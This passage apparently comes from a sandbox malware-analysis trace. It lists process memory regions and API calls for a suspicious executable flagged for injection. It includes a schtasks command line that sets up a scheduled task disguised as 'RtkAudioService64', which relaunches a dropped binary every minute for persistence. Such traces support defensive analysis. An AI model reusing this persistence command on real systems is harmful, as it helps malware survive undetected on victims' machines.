= 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2395 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2396 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2397 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2398 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2399 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2400 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2401 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2402 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2403 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 297 os_tid = 0x1388 Thread: id = 298 os_tid = 0x137c Process: id = "79" image_name = "force which baby.exe" filename = "c:\\program files (x86)\\windowspowershell\\force which baby.exe" page_root = "0x70642000" os_pid = "0x1364" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\force which baby.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2404 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2405 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2406 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2407 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2408 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2409 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2410 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2411 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2412 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2413 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2414 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2415 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2416 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2417 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2418 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2419 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2420 start_va = 0x620000 end_va = 0x6dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 2421 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2422 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2423 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2424 start_va = 0x940000 end_va = 0x956fff monitored = 0 entry_point = 0x9414a1 region_type = mapped_file name = "force which baby.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\force which baby.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\force which baby.exe") Region: id = 2425 start_va = 0x960000 end_va = 0xae7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2426 start_va = 0xaf0000 end_va = 0xc70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 2427 start_va = 0xc80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 2428 start_va = 0x21b0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 2429 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 2430 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2431 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2432 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2433 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2434 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2435 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2436 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2437 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2438 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2439 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2440 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2441 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2442 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2443 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2444 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2445 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2446 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2447 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2448 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2449 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2450 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2451 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2452 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2453 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2454 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2455 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2456 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 299 os_tid = 0x1380 Thread: id = 300 os_tid = 0x1368 Process: id = "80" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x346ee000" os_pid = "0x1310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc80" cmd_line = "\"C:\\Windows\\SysWOW64\\schtasks.exe\" /create /tn RtkAudioService64 /tr \"C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe\" /sc minute /mo 1 /F" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2224 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2225 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2226 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2227 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2228 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2229 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2230 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2231 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2232 start_va = 0x3a0000 end_va = 0x3d1fff monitored = 1 entry_point = 0x3c05b0 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 2233 start_va = 0x3e0000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2234 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2235 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2236 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2237 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2238 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2239 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2240 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2241 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2243 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2244 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2245 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2246 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2247 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2248 start_va = 0x160000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2249 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2250 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2251 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2252 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2336 start_va = 0x2b0000 end_va = 0x36dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2337 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2338 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2339 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2340 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2341 start_va = 0x1b0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2342 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2343 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2344 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2345 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2346 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2347 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2348 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2349 start_va = 0x4600000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 2350 start_va = 0x4640000 end_va = 0x4729fff monitored = 0 entry_point = 0x467d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2510 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2511 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2512 start_va = 0x4640000 end_va = 0x4a3afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004640000" filename = "" Region: id = 2513 start_va = 0x4a40000 end_va = 0x4d76fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2519 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2699 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2700 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2701 start_va = 0x380000 end_va = 0x380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2702 start_va = 0x68060000 end_va = 0x680ebfff monitored = 0 entry_point = 0x6809a6c0 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 2710 start_va = 0x6d3c0000 end_va = 0x6d3ecfff monitored = 0 entry_point = 0x6d3d2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Thread: id = 306 os_tid = 0x1314 [0210.285] GetModuleHandleA (lpModuleName=0x0) returned 0x3a0000 [0210.285] __set_app_type (_Type=0x1) [0210.285] __p__fmode () returned 0x75734d6c [0210.285] __p__commode () returned 0x75735b1c [0210.285] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3c0840) returned 0x0 [0210.285] __wgetmainargs (in: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8, _DoWildCard=0, _StartInfo=0x3cadf4 | out: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8) returned 0 [0210.286] _onexit (_Func=0x3c2bc0) returned 0x3c2bc0 [0210.286] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.286] WinSqmIsOptedIn () returned 0x0 [0210.287] GetProcessHeap () returned 0x1b0000 [0210.287] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7378 [0210.287] RtlRestoreLastWin32Error () returned 0x0 [0210.287] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0210.287] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0210.287] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0210.287] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0210.287] GetProcessHeap () returned 0x1b0000 [0210.287] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7438 [0210.287] lstrlenW (lpString="") returned 0 [0210.287] GetProcessHeap () returned 0x1b0000 [0210.287] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x2) returned 0x1b0598 [0210.287] GetProcessHeap () returned 0x1b0000 [0210.287] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6e90 [0210.287] GetProcessHeap () returned 0x1b0000 [0210.287] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7408 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6c58 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6c78 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6c98 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6888 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b74e0 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b68a8 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b68c8 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6620 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6640 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1b7390 [0210.288] GetProcessHeap () returned 0x1b0000 [0210.288] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b6660 [0210.289] GetProcessHeap () returned 0x1b0000 [0210.289] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x14) returned 0x1b27b0 [0210.289] GetProcessHeap () returned 0x1b0000 [0210.289] RtlAllocateHeap 